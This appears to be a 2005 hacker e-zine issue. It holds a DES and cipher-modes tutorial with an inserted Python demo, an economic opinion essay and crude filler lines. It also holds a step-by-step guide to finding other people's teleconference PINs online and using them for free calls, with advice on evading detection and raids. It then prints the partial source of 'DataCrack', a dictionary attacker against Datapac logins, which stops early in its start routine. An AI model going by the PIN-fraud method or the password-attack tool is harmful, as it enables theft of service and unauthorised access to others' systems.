                  |               ~or~                |
                  |     How I learned to punt Eve     |
                  |        and strengthen DES         |
                  |                                   |
                  |            by aestetix            |
                  +-----------------------------------+

This is a continuation of my article "Dismantling DES" which appeared in
K-1ine #44, and I'll be making certain assumptions about the reader's
knowledge of the algorithm and cryptology vocabulary.

When we left off from the first article, we made several sore assumptions:
thinking that the only noteworthy attribute of the key is its length, that
the existence of substitution boxes (s-boxes) is enough to guarantee their
security, and that multiple iterations alone strengthen the resilience of the
algorithm. While we did explore the EFF project attacking DES's strength, we
rested with satisfaction that key brute forcing was the only effective
technique. In essence, we ignored any practical philosophies that
cryptanalysts might use in crypto-assault.

-------------------+
Death to the Keys!|
-------------------+

First, let's examine the structure of keys in general. We can think of them
in similar fashion to passwords: how many tricks are there to securing your
password, and how many people actually use them? We have alphanumeric
suggestions, as well as case sensitivity using non-Roman characters, but
there are two harsh realities: people don't like remembering complex globs
of crap when they just want to do their work (or play), and schools or
companies enforcing militant password regulations tend to have escrows of
keys following the same format (dictionary word + number is common).

How does this relate to key structure in a crypto algorithm? Well, if you
are using keys composed of ASCII characters, there's usually a slim window
within which the key will be found. For example, if your keys are all
letters and numbers, you can set a brute-force analyzer to scan within the
range of 0x30 and 0x7F. This alone eliminates nearly 30% of your spectrum.
Second, there are certain patterns in key structure that will probably not
occur. Would anyone prudently structure a key with repetitions like
0x5656565656? Even interlacing key combinations like 0x1F2E3D4C5B probably
won't occur. The more ignorable patterns you can observe, the more efficient
your key scanner will be.

--------------------------+
The "S" stands for "sexy"|
--------------------------+

Second, we have s-boxes. Before we run into analysis of s-box architecture,
we need to introduce the "avalanche" concept. When we think of cause-effect
situations, we think very directly. Because he has a car, he can drive to
work. If he has a job, he will be paid for his work. This extends to
crypto-thought in many ways: in a simple substitution cipher, if you change
a single letter so that plaintext "B" now becomes "D" instead of "R", every
instance of R in the ciphertext will change to D.
However, a more secure algorithm would set it so that if you change "B",
both "D" becomes "R" AND "S" becomes "T". In essence, we've changed things
so that altering a single plaintext character affects the outcome of
multiple ciphertext characters. Rather than a cause-effect ratio of 1:1
(1 cause : 1 effect), it becomes 1:2. According to avalanche philosophy, the
greater the ratio (1:50, 1:500), the more difficult it will be to deduce the
plaintext with solely the ciphertext.

But how does this relate to s-box strength? Well, if you change the s-box
contents at all, how much will it affect the ultimate ciphertext you get?
For example, if your s-box contains a 4*6 grid of 1 through 20, like such:

                              +-----------+
                              |1  2  3  4 |
                              |5  6  7  8 |
                              |9  10 11 12|
                              |13 14 15 16|
                              |17 18 19 20|
                              |21 22 23 24|
                              +-----------+

it does absolutely nothing. If you reverse the order (start with 24, end
with 1) it makes it slightly secure, but an amateur cryptanalyst should be
able to decode it. Introduce more elements (repeat numbers, use different
sequences, random number generators, etc) and the result gets more
obfuscated. For example, an s-box created by the Fibonacci sequence will
have a different effect than one created by a random number generator. More
so, different randomness algorithms will have different effects.

But let's take it a step farther, incorporating the ratios: what if you
change two numbers and four in the ciphertext are changed? This makes
reverse engineering (trying to decipher the key through the cipher) far more
difficult. Better yet, say we formulate the s-boxes so that making a single
bit change in the plaintext changes -every- bit in the ciphertext? Now we
can better understand how the avalanche effect is seen in s-boxes. In
thwarting expert cryptanalysts, cycle iterations are far more useful when
you have a well-designed s-box with a significant avalanche effect.
Although we left them on a pale horse in the last article, s-box strength
can make or break a decent algorithm.

However, our DES structure is still insecure. Let's examine our current
security elements: we have a key based on pseudo-random characters, with
little visible pattern and isolated ASCII characters; our s-boxes, the heart
of our system, are fastened with the most avalanche-inducing number
generator possible; but there's still something missing. Now that we have
pumped up the parts of a single cycle, we need to be concerned with the
iterations themselves. This is where we get into cipher block operation
modes.

----------------------------+
The Four Pillars of DEStiny|
----------------------------+

As we established in the first article, DES is a block cipher, meaning that
data is processed in blocks of data, rather than streamed through. For each
cycle, we have a chunk of plaintext, a generated chunk of key, and a general
operation mode that's performed on the entire body. There are four main
modes: Electronic Codebook (ECB), Cipher Block Chaining (CBC), Cipher
Feedback (CFB), and Output Feedback (OFB). ECB is the default mode we've
been using so far, aptly named because, as each cycle uses a fresh plaintext
input and key, multiple cycles essentially generate a "code book" where each
chunk can be traced to its ciphertext. Good for explanation, but dreadful
for security.

CBC makes DES somewhat more secure. With CBC, the output ciphertext of the
cycle is xored with the input plaintext of the next cycle before the
encryption process occurs. Let's look at a diagram to illustrate this point:

                  -~+ CIPHER BLOCK CHAINING MODE +~-

   Output           Input                Input
    from           current                next
  previous            PT                   PT
      |               |                    |
      +---->------+ (xor)          +---+ (xor)
                      |            |       |
                +------------+     |   +--------+
                |    DES     |     |   |next DES|
         key ->-|  encrypt   |     |   | encrypt|
                +------------+     |   +--------+
                      |            |       |
                     CT +-->-------+       +--next CT

Of course, this picture assumes we're in the middle of multiple cycles.
The main point to remember is that the output from the previous cycle
becomes part of the input for the next. To clarify: if you're mixing meat
and tomato sauce, the output will be spaghetti sauce. The sauce then becomes
input for the pasta you've prepared, and the cooking algorithm creates an
Italian dinner :)

The xoring process creates a link between the cycles, so that instead of
being able to use a plaintext/key chunk and have a corresponding ciphertext,
each subsequent cycle will change depending on the order. Thus, instead of
having a code book of cycles, we have a system that's chained together,
where each cycle is dependent on the others. Remember that avalanching
concept? ;) This makes the system more secure on a level parallel to a
Vernam cipher.

CFB, on the other hand, takes the next step and applies a cycling shift
register scheme. To get an idea of how this works, let's first imagine two
wheels-- a large wheel and a small wheel-- rotating at the same speed. If
you draw a chalk mark on the edge of each wheel, you'll notice that as they
rotate, the chalk mark on the smaller wheel seems to rotate much more
quickly. This is because the mark on the big wheel has much more ground to
cover, and a single rotation of the small wheel doesn't provide enough time
for the big mark to finish. Here's how this relates to CFB: we actually have
-two- different operations going on at the same time-- the typical shifting
going on inside each cycle, and an additional shift operation mixed with the
cyclic xor that rotates a small amount (let's say 8 bits) per cycle.
Once again, a picture should help clarify that jargon:

                     -~+ Cipher Feedback Mode +~-

  Last Cycle             +--------------+          +-------+
      +                  |  Shift Reg   |          | Next  |
      |             +----| 64-8 | 8 bits|       +--| Cycle |
+------------+      |    +--------------+       |  +-------+
| Shift Reg  |      |             |             |
| 64-8|8bits |      |       +-----------+       |
+------------+      |  key--|    DES    |       |
      |             |       |  encrypt  |       |
    (xor) +-->------+       +-----------+       ^
      |                        CT |             |
     PT                  +--------------+       |
                         |  Shift Reg   |       |CT
                         | 64-8 | 8 bits|       |
                         +--------------+       |
                                    |           |(xor)
                                    +-->--------+------<-----PT

The curious bits here involve the mysterious shift registers that have shown
up before and after the DES encryption, and the "8 bits" notes everywhere.
Let's watch a cycle. We draw input from the ciphertext of the previous
cycle, and the leftmost (most significant) 8 bits from the ciphertext are
xored with the first bit of plaintext. This is then shifted so that the
xored bits become the 8 rightmost bits, and the encryption continues. When
we get back to the xoring with plaintext, we repeat the cycle of rotation
until eventually all bits have been xored. Therefore, the smaller wheel, the
one whose mark rotates faster, is the individual DES encryption within each
cycle, while the larger wheel consists of the ultimate xoring of plaintext
and input ciphertext.

The final mode, OFB, is similar to the CFB mode, except that the ciphertext
from the cycle is output before the xoring process with the plaintext
occurs. This helps with parity, and assures that errors in transmission
don't continue to the next cycle. However, because the xoring step is
removed, it makes this mode slightly more vulnerable.

Overall, there are many aspects of DES which, if focused on, could be made
much stronger. While there remain many criticisms, the basic techniques and
thought used for cryptanalysis in this article can easily be extended onto
other algorithms using similar concepts, and in general are useful for
understanding both composition of and deconstruction of cryptosystems.
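
The four modes and the avalanche effect described above can be compared side
by side with the following Python code, which is an added example and not
part of aestetix's article. Python's standard library has no DES, so it
assumes a stand-in 64-bit Feistel cipher built on SHA-256 (encrypt_block and
decrypt_block are hypothetical names, not DES); KEY, IV and PT are constructed
sample values, and ECB and CBC here expect input that is a multiple of 8 bytes.

```python
import hashlib

BLOCK = 8  # bytes per block; DES also works on 64-bit blocks

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    # Round function of the stand-in cipher (an assumption, NOT DES's s-boxes).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]

def encrypt_block(key, block, rounds=16):
    left, right = block[:4], block[4:]
    for rnd in range(rounds):
        left, right = right, _xor(left, _f(key, rnd, right))
    return right + left

def decrypt_block(key, block, rounds=16):
    left, right = block[:4], block[4:]
    for rnd in reversed(range(rounds)):
        left, right = right, _xor(left, _f(key, rnd, right))
    return right + left

def split(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def ecb_encrypt(key, pt):
    # Every block is encrypted on its own: equal plaintext, equal ciphertext.
    return b"".join(encrypt_block(key, b) for b in split(pt))

def cbc_encrypt(key, iv, pt):
    prev, out = iv, []
    for b in split(pt):
        prev = encrypt_block(key, _xor(b, prev))  # previous CT xored into next PT
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    prev, out = iv, []
    for c in split(ct):
        out.append(_xor(decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)

def cfb8(key, iv, data, decrypt=False):
    reg, out = iv, bytearray()
    for byte in data:
        out.append(byte ^ encrypt_block(key, reg)[0])  # leftmost 8 bits of output
        fed_back = byte if decrypt else out[-1]        # always the ciphertext byte
        reg = reg[1:] + bytes([fed_back])              # shift register moves 8 bits
    return bytes(out)

def ofb(key, iv, data):
    # The same call encrypts and decrypts: the keystream never sees the data.
    reg, out = iv, bytearray()
    for i, byte in enumerate(data):
        if i % BLOCK == 0:
            reg = encrypt_block(key, reg)  # feedback is the cipher output itself
        out.append(byte ^ reg[i % BLOCK])
    return bytes(out)

def avalanche(key, block, bit, rounds=16):
    # Number of ciphertext bits that change when one plaintext bit is flipped.
    flipped = bytearray(block)
    flipped[bit // 8] ^= 0x80 >> (bit % 8)
    a = encrypt_block(key, block, rounds)
    b = encrypt_block(key, bytes(flipped), rounds)
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

def damaged(expected, got):
    # Indices of plaintext bytes that did not survive decryption.
    return [i for i, (x, y) in enumerate(zip(expected, got)) if x != y]

def flip_bit(data, index):
    out = bytearray(data)
    out[index] ^= 0x01
    return bytes(out)

# Constructed sample values (not from the article).
KEY = b"k1ine#45"
IV = bytes(range(8))
PT = b"ATTACK!!" * 3 + b"RETREAT!"  # three identical blocks, then a different one

if __name__ == "__main__":
    print("ECB:", [b.hex() for b in split(ecb_encrypt(KEY, PT))])
    print("CBC:", [b.hex() for b in split(cbc_encrypt(KEY, IV, PT))])
    for n in (1, 2, 4, 16):
        print(n, "round(s):", avalanche(KEY, PT[:8], 0, n), "of 64 bits changed")
    hit = flip_bit(cfb8(KEY, IV, PT), 3)
    print("CFB-8 damage:", damaged(PT, cfb8(KEY, IV, hit, decrypt=True)))
    print("OFB damage:  ", damaged(PT, ofb(KEY, IV, flip_bit(ofb(KEY, IV, PT), 3))))
```

With one round a flipped plaintext bit changes a single ciphertext bit, while
16 rounds change roughly half of them; a flipped ciphertext bit damages one
byte under OFB but up to nine consecutive bytes under CFB-8.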

------------+
References:|
------------+

All the same as the first article, as well as _Handbook of Applied
Cryptography_ by Menezes, van Oorschot, and Vanstone

-----------+
Shoutouts:|
-----------+

Thanks to The Clone, who bitched, whined, and nagged until I finally wrote
this. To ProffEKS for your laptop... also to various geeks in #binrev on
dalnet, se2600, mw2600, and of course #hackcanada.

+-aestetix
aestetix@aestetix.net
http://www.aestetix.net
20 May 2005

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Man, My dick pumps out 90,000 megawatts of juice every day! And your
boyfriends love it.

              The Guide to Using Google to Get Free Confz

Teleconferences. Confs. What are they? Essentially they are like party
lines. Dial them up, and a bunch of people might be on. Why would you want
to do this? For fun, or to make prank calls where multiple people can
listen, or to trade l33t codes or exchange ideas. You can also 3rd party
bill with some, and you can probably even use it as a diverter point with
modems. You can dial in from one phone number, have your modem listen, then
dial in from another point on the planet and get your modem to connect to
it. There are more uses for teleconfs, but I'm sure most of them are
obvious.

In the past, people beige boxed or used COCOTs to set up teleconferences.
They would dial one up, talk to the operator and tell them they would like
to set up a teleconference. The operator would ask them how they would like
to pay for it. The phreak would then say "I want to charge it to my number".
The operator would then ask for the number, and the phreak would give them
the number of the COCOT or the number of the pair they are beiging from.
They would both hang up and the operator would dial the number back to make
sure that the number and the person being charged is "legit". They would
then be given 2 pins: the moderator pin and the user pin. The user pin is
what everyone uses and the moderator pin is what the moderator uses (really
hard to figure out, eh?). The phreak would then share his conf with other
people who would then dial it up.

Ok, enough of what you probably already know. Here is the way we do it in
the year 2005 in three easy steps:

  1) Go to google
  2) Google the teleconference 800 number (Example: 1-800-315-6338).
  3) Sift through the results for the PIN numbers and try them to see if
     they work.

I know many people have known about this and have been doing this for years
now. This isn't exactly new stuff, but I think there are a lot of people out
there who do not know about this stuff and would like to. I was doing this
about a year and a half ago and am finding more hits now than I did then,
well, at least hits with pins that work anyways.

In a session of searching for conf pins that worked I found 3 different
confs in about an hour, and lots more results that I didn't bother to check.
I mean, if you have 3 conference numbers why would you need more? Why would
you even need more than one?

A few notes before I close up.

- I would highly recommend *NOT* using your home line for phoning confs. I
  have heard stories of people being _RAIDED_ just because they phoned a
  conf from their house. I don't know if this is true or not, but on the
  telephone bill they will see all numbers that dialed the conf, this I am
  sure of.

- Try using other search engines besides google. You may find more results
  or different results that google doesn't show.

- At night is the best time to conf/check pins because during the day there
  might be legitimate conferences going on, and popping onto a conf and
  being like "WORD UP MY FRIENDS!" and being greeted by company executives
  is not only embarrassing, but also irresponsible because the company is
  more likely to investigate. In a post 9/11 world, you might even be
  accused of industrial espionage and/or terrorism because you phoned a conf
  and might have heard some executives say something confidential.

- Try to see if you have moderator privileges and see if you can summon an
  operator. They might be able to dial out for you.

- The conferences you will find will last until about the end of the month.
  Most conferences that are set up are set to terminate at the end of the
  month. This is also when the company gets their phone bill and sees all
  the fraudulent calls. So if you need a conf number, the best time to get
  one is at the very beginning of the month.

Props to: Sandnigger, FatBob, NetSpread, Doc_X and The Clone.

-Aftermath
aftermath12345@hotmail.com

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

DON'T DRINK AND DRIVE
I'm bert and I'm gert stay alert, and stay safe.

                    The Inevitable Crash of Society
               Cybur Netiks (cybur_netiks@Phreaker.net)
                -=http://hackdaplanet.freespaces.com=-

Hello, it's been a while since I wrote my last article, I have been busy,
and so is everybody else it seems. I have been busy on the ridiculous number
of projects I take on at once, but most people out there are busy just
trying to maintain life. Now most people would think that it's not that bad,
well look over your bills and pay cheques over the last few years, unless
you have had some large promotion or sudden monetary gain over the past
years, you will probably see how much your cost of living has gone up and
your income has gone down. Now, why is this? Most people nowadays simply
blame it on rising fuel costs, and while this is a big part of it, it is not
the only part of it. If you were to look back on history in very fine
detail, you may notice that the very basis of our society has been the same
for at least 2000 years. Don't believe me?
What is at the base of our economy? Not fuel, not money, but people. People
spend their whole lives working to put energy towards keeping society alive
for just one more day, every day you get up, go to work, and lose more than
half your earnings to the system. Now, we do not know of anything that is
perpetual, but society pushes on with the illusion of being perpetual, but
again, look back on history, every so often, society crashes (the most
recent one being the 1930's) and after every crash comes a large event to
start the motion all over again (world war II, now I don't blame our
governments for starting it, but it was going to happen sooner or later) but
again, the motion can only last so long, then comes inflation, the energy
supply will wear down while the demand increases (decreased earnings,
increased costs) until there is not enough energy to power the motion, then
it will crash and most likely be started again. This is a fairly simple
scientific and mathematical concept (the following is mostly just opinion).

The US is trying something different now, they see the crash coming and are
trying to avoid it from happening by boosting society now instead of after
the crash, look on the news, they are picking on new countries all the time,
and even plan to invade some but never do, it seems they are picking their
fights, they are just picking on little guys, building up resources
desperately hoping to shelter themselves from yet another crash. I can't
tell you when society will crash, I am no mathematician, but I can say this,
it will happen eventually, and the hardest hit will not be the ones who have
very little, but rather those who have all the money in the world.
If a man who expects to lose his house any day now loses his house, it will
come as little shock to him, and a man who lives on the street will barely
notice the difference, but a man in an upper-scale riverside house who loses
his well-paying job due to downsizing, he will be hit very hard and will be
likely to have a breakdown or even commit suicide; the shock will be just
too much for him to handle. So the next time you see a man asking for change
on a street corner, or sorting through a trash can for a couple of bottles,
don't shun him, just think, he could not be more prepared for the crash of
society.

Copyright (c) 2005 hackdaplanet

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

I don't often masturbate in public

Datapac Hacker's Kit: DataCrack Source Code
by: Aftermath

Download it at:
http://www.hackcanada.com/canadian/hacking/datapac_hackers_kit.rar

According to Hack Canada: "Includes the Datascan NUA scanner and the
Datacrack username/password dictionary attacker for windows. VB source code
included."
(Notes: Form1.FRX and frmAbout.FRX excluded due to mangled code)

- Form1.FRM:

VERSION 5.00
Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"
Begin VB.Form Form1
   BorderStyle = 1 'Fixed Single
   Caption = "DataCrack - datapac dictionary attacker"
   ClientHeight = 5190
   ClientLeft = 405
   ClientTop = 2235
   ClientWidth = 8475
   Icon = "Form1.frx":0000
   LinkTopic = "Form1"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 5190
   ScaleWidth = 8475
   Begin VB.Timer Timer6
      Left = 3840
      Top = 1680
   End
   Begin VB.Timer Timer5
      Left = 3840
      Top = 1560
   End
   Begin VB.Frame Frame5
      Caption = "Extra data to send:"
      Height = 5175
      Left = 4440
      TabIndex = 36
      Top = 0
      Width = 3975
      Begin VB.Frame Frame8
         Caption = "data to send after sending address"
         Height = 1335
         Left = 120
         TabIndex = 53
         Top = 3720
         Width = 3735
         Begin VB.TextBox txtaddressreturn
            Enabled = 0 'False
            Height = 285
            Left = 2280
            TabIndex = 56
            Text = "0"
            ToolTipText = "send this amount of return keys after extra data is sent after the address is sent"
            Top = 720
            Width = 375
         End
         Begin VB.TextBox txtaddress1
            Height = 285
            Left = 120
            TabIndex = 54
            ToolTipText = "put data in here that you need sent after the address has been sent"
            Top = 360
            Width = 3495
         End
         Begin VB.Label Label24
            Caption = "time(s)"
            Height = 255
            Left = 2760
            TabIndex = 57
            Top = 840
            Width = 495
         End
         Begin VB.Label Label23
            Caption = "send extra Return Key(s)"
            Height = 255
            Left = 480
            TabIndex = 55
            Top = 840
            Width = 1815
         End
      End
      Begin VB.Frame Frame7
         Caption = "data to send after password is sent"
         Height = 1575
         Left = 120
         TabIndex = 38
         Top = 2040
         Width = 3735
         Begin VB.TextBox txtpasscycle
            Enabled = 0 'False
            Height = 285
            Left = 1560
            TabIndex = 51
            Text = "0"
            ToolTipText = "send this extra data ever n amount of cycles"
            Top = 1200
            Width = 375
         End
         Begin VB.TextBox txtpassreturn
            Enabled = 0 'False
            Height = 285
            Left = 2280
            TabIndex = 48
            Text = "0"
            ToolTipText = "put the number of return keys you need to send after the extra data"
            Top = 720
            Width = 375
         End
         Begin VB.TextBox txtpasssend1
            Height = 285
            Left = 120
            TabIndex = 46
            ToolTipText = "put data in here that you want to be sent after the password has been sent"
            Top = 360
            Width = 3495
         End
         Begin VB.Label Label22
            AutoSize = -1 'True
            Caption = "cycles"
            Height = 195
            Left = 2160
            TabIndex = 52
            Top = 1200
            Width = 450
         End
         Begin VB.Label Label21
            AutoSize = -1 'True
            Caption = "do this every"
            Height = 195
            Left = 480
            TabIndex = 50
            Top = 1200
            Width = 900
         End
         Begin VB.Label Label20
            Caption = "time(s)"
            Height = 255
            Left = 2880
            TabIndex = 49
            Top = 840
            Width = 495
         End
         Begin VB.Label Label19
            AutoSize = -1 'True
            Caption = "send extra Return Keys "
            Height = 195
            Left = 480
            TabIndex = 47
            Top = 840
            Width = 1695
         End
      End
      Begin VB.Frame Frame6
         Caption = "data to send after username is sent:"
         Height = 1695
         Left = 120
         TabIndex = 37
         Top = 240
         Width = 3735
         Begin VB.TextBox txtusernamecycles
            Enabled = 0 'False
            Height = 285
            Left = 1440
            TabIndex = 44
            Text = "0"
            ToolTipText = "send extra data and extra return keys every n amount of cycles"
            Top = 1200
            Width = 375
         End
         Begin VB.TextBox txtusernamereturn
            Enabled = 0 'False
            Height = 285
            Left = 2280
            TabIndex = 41
            Text = "0"
            ToolTipText = "send n amount of return keys to the host after username and extra data is sent"
            Top = 720
            Width = 375
         End
         Begin VB.TextBox txtusernamesend1
            Height = 285
            Left = 120
            TabIndex = 39
            ToolTipText = "put data in here that is to be sent to terminal client after username is sent. Leave blank for no send."
            Top = 240
            Width = 3495
         End
         Begin VB.Label Label18
            AutoSize = -1 'True
            Caption = "cycles"
            Height = 195
            Left = 1920
            TabIndex = 45
            Top = 1200
            Width = 450
         End
         Begin VB.Label Label16
            AutoSize = -1 'True
            Caption = "do this every"
            Height = 195
            Left = 480
            TabIndex = 43
            Top = 1200
            Width = 900
         End
         Begin VB.Label Label14
            AutoSize = -1 'True
            Caption = "time(s)"
            Height = 195
            Left = 2760
            TabIndex = 42
            Top = 720
            Width = 450
         End
         Begin VB.Label Label12
            AutoSize = -1 'True
            Caption = "send extra Return Keys"
            Height = 195
            Left = 480
            TabIndex = 40
            Top = 720
            Width = 1650
         End
      End
   End
   Begin VB.CommandButton cmdstop
      Caption = "Stop"
      Default = -1 'True
      Height = 735
      Left = 1440
      TabIndex = 35
      ToolTipText = "click here to reset/stop the attack"
      Top = 4440
      Width = 1455
   End
   Begin VB.CommandButton cmdstart
      Caption = "Start"
      Height = 735
      Left = 0
      TabIndex = 34
      ToolTipText = "start attack"
      Top = 4440
      Width = 1335
   End
   Begin VB.CommandButton cmdhelp
      Caption = "Help"
      Height = 735
      Left = 3000
      TabIndex = 33
      Top = 4440
      Width = 1335
   End
   Begin VB.Frame Frame4
      Caption = "Stats and results:"
      Height = 1095
      Left = 0
      TabIndex = 24
      Top = 3240
      Width = 4335
      Begin VB.Shape Shape1
         BackColor = &H000000FF&
         BackStyle = 1 'Opaque
         BorderColor = &H00FF0000&
         FillColor = &H000000FF&
         FillStyle = 0 'Solid
         Height = 375
         Left = 3120
         Shape = 2 'Oval
         Top = 240
         Width = 975
      End
      Begin VB.Label lbltimerunning
         BorderStyle = 1 'Fixed Single
         Height = 255
         Left = 2400
         TabIndex = 32
         ToolTipText = "time the attack started at"
         Top = 720
         Width = 1815
      End
      Begin VB.Label Label17
         Caption = "Running since:"
         Height = 375
         Left = 1680
         TabIndex = 31
         Top = 600
         Width = 735
      End
      Begin VB.Label lblpercentcomplete
         BorderStyle = 1 'Fixed Single
         Height = 255
         Left = 840
         TabIndex = 30
         ToolTipText = "percentage complete"
         Top = 720
         Width = 735
      End
      Begin VB.Label Label15
         Caption = "% complete:"
         Height = 435
         Left = 120
         TabIndex = 29
         Top = 600
         Width = 705
      End
      Begin VB.Label lbltotalcycle
         BorderStyle = 1 'Fixed Single
         Height = 255
         Left = 2160
         TabIndex = 28
         ToolTipText = "total cycle count"
         Top = 240
         Width = 735
      End
      Begin VB.Label Label13
         Caption = "of:"
         Height = 255
         Left = 1800
         TabIndex = 27
         Top = 240
         Width = 255
      End
      Begin VB.Label lblcurrentcycle
         BorderStyle = 1 'Fixed Single
         Caption = "0"
         Height = 255
         Left = 840
         TabIndex = 26
         ToolTipText = "current cycle count"
         Top = 240
         Width = 735
      End
      Begin VB.Label Label11
         Caption = "on cycle: "
         Height = 255
         Left = 120
         TabIndex = 25
         Top = 240
         Width = 735
      End
   End
   Begin MSComDlg.CommonDialog CommonDialog1
      Left = 3720
      Top = 2640
      _ExtentX = 847
      _ExtentY = 847
      _Version = 393216
   End
   Begin VB.Timer Timer4
      Left = 3840
      Top = 1440
   End
   Begin VB.Timer Timer3
      Left = 3840
      Top = 1320
   End
   Begin VB.Timer Timer2
      Left = 3840
      Top = 1200
   End
   Begin VB.Timer Timer1
      Left = 3840
      Top = 1080
   End
   Begin VB.Frame Frame3
      Caption = "Timing"
      Height = 1335
      Left = 0
      TabIndex = 13
      Top = 1920
      Width = 4335
      Begin VB.TextBox txtwaitpassword
         Height = 285
         Left = 600
         TabIndex = 21
         Text = "2000"
         ToolTipText = "this is the amount of time to wait before the password is sent."
         Top = 960
         Width = 735
      End
      Begin VB.TextBox txtwaitusername
         Height = 285
         Left = 600
         TabIndex = 18
         Text = "2000"
         ToolTipText = "this is the amount of seconds to wait after the username is sent"
         Top = 600
         Width = 735
      End
      Begin VB.TextBox txtwaitsendkeys
         Height = 285
         Left = 600
         TabIndex = 15
         Text = "3000"
         ToolTipText = "this is the amount of time you wait before the attack starts"
         Top = 240
         Width = 735
      End
      Begin VB.Label Label10
         AutoSize = -1 'True
         Caption = "Miliseconds after password is sent"
         Height = 195
         Left = 1440
         TabIndex = 22
         Top = 960
         Width = 2400
      End
      Begin VB.Label Label9
         AutoSize = -1 'True
         Caption = "Wait"
         Height = 195
         Left = 120
         TabIndex = 20
         Top = 960
         Width = 330
      End
      Begin VB.Label Label8
         AutoSize = -1 'True
         Caption = "Miliseconds after username is sent"
         Height = 195
         Left = 1440
         TabIndex = 19
         Top = 600
         Width = 2415
      End
      Begin VB.Label Label7
         AutoSize = -1 'True
         Caption = "Wait"
         Height = 195
         Left = 120
         TabIndex = 17
         Top = 600
         Width = 330
      End
      Begin VB.Label Label6
         AutoSize = -1 'True
         Caption = "Miliseconds before starting SendKeys()"
         Height = 195
         Left = 1440
         TabIndex = 16
         Top = 240
         Width = 2730
      End
      Begin VB.Label Label5
         AutoSize = -1 'True
         Caption = "Wait"
         Height = 195
         Left = 120
         TabIndex = 14
         Top = 240
         Width = 330
      End
   End
   Begin VB.Frame Frame2
      Caption = "NUA Address"
      Height = 975
      Left = 0
      TabIndex = 7
      Top = 960
      Width = 4335
      Begin VB.CheckBox chkperiod
         Caption = "send period(.)"
         Height = 375
         Left = 3240
         TabIndex = 23
         ToolTipText = "this sends the period that initates the datapac connection"
         Top = 480
         Width = 975
      End
      Begin VB.TextBox txtsendaddress
         Enabled = 0 'False
         Height = 285
         Left = 1680
         TabIndex = 11
         Text = "1"
         ToolTipText = "send the address every n cycle. Use this if you only get three tries per session with the target host."
         Top = 600
         Width = 375
      End
      Begin VB.CheckBox chkaddress
         Caption = "send address more than once"
         Height = 375
         Left = 1320
         TabIndex = 9
         ToolTipText = "check this box if you need to send the address more than once (use if you only get three tries before disconnect etc)"
         Top = 120
         Width = 2415
      End
      Begin VB.TextBox txtaddress
         Height = 285
         Left = 120
         TabIndex = 8
         Text = "10000500"
         ToolTipText = "put the datapac address here"
         Top = 240
         Width = 1095
      End
      Begin VB.Label Label4
         Caption = "Cycle(s)"
         Enabled = 0 'False
         Height = 255
         Left = 2160
         TabIndex = 12
         Top = 600
         Width = 615
      End
      Begin VB.Label Label3
         Caption = "Send Address every:"
         Enabled = 0 'False
         Height = 255
         Left = 120
         TabIndex = 10
         Top = 600
         Width = 1575
      End
   End
   Begin VB.Frame Frame1
      Caption = "File Paths"
      Height = 975
      Left = 0
      TabIndex = 0
      Top = 0
      Width = 4335
      Begin VB.CheckBox chkusername
         Caption = "Check1"
         Height = 255
         Left = 3600
         TabIndex = 58
         ToolTipText = "uncheck this if you only need to use passwords"
         Top = 240
         Value = 1 'Checked
         Width = 255
      End
      Begin VB.CommandButton cmdcommondialog2
         Caption = "..."
         Height = 255
         Left = 3960
         TabIndex = 6
         ToolTipText = "change path"
         Top = 600
         Width = 255
      End
      Begin VB.TextBox txtpasswords
         Height = 285
         Left = 960
         TabIndex = 5
         Text = "c:\pw.txt"
         ToolTipText = "path to the file with the password list"
         Top = 600
         Width = 2895
      End
      Begin VB.CommandButton cmdcommondialog1
         Caption = "..."
         Height = 255
         Left = 3960
         TabIndex = 3
         ToolTipText = "change path"
         Top = 240
         Width = 255
      End
      Begin VB.TextBox txtusernames
         Height = 285
         Left = 960
         TabIndex = 1
         Text = "c:\users.txt"
         ToolTipText = "path to the file with the usernames"
         Top = 240
         Width = 2535
      End
      Begin VB.Label Label2
         Caption = "passwords:"
         Height = 255
         Left = 120
         TabIndex = 4
         Top = 600
         Width = 855
      End
      Begin VB.Label Label1
         Caption = "usernames:"
         Height = 255
         Left = 120
         TabIndex = 2
         Top = 240
         Width = 855
      End
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'yet another program that has to do with datapac hacking and uses the sendkeys() function
'god dayum. I wish my modem wasnt such a stupid peice of shit or i'd be using
'the mscomm component right now. Stupid stupid stupid stupid fucking modem D:

'Oh, and about this code. It was extreemly hard for me to write because of the
'variable names I used. If you dont understand, you will in a minute..

'i dedicate this program to the memory of Doctor Hunter S Thompson.
'Hunter was a good man. He spoke truth in his words.
'Long live the memory of the good doctor.
'RIP HST

Public hst, gonzo As String
Public lsd, hells_anges, strippers, american_dream As Boolean
Public mescaline As Integer
Public fuck_nixon, fear_and_loathing, lono, generation, sheriff, white_rabbit, politics As Integer

Private Sub chkaddress_Click()
    If chkaddress.Value = Checked Then
        Label3.Enabled = True
        txtsendaddress.Enabled = True
        Label4.Enabled = True
    Else
        Label3.Enabled = False
        txtsendaddress.Enabled = False
        Label4.Enabled = False
    End If
End Sub

Private Sub cmdcommondialog1_Click()
    CommonDialog1.ShowOpen
    txtusernames.Text = CommonDialog1.FileName
End Sub

Private Sub cmdcommondialog2_Click()
    CommonDialog1.ShowOpen
    txtpasswords.Text = CommonDialog1.FileName
End Sub

Private Sub cmdhelp_Click()
    frmAbout.Show
End Sub

Private Sub cmdstart_Click()
    'ok. this is where everything starts.
    Close
    lsd = False
    strippers = False
    american_dream = False
    fuck_nixon = 1
    generation = 0
    lono = 0
    mescaline = 0
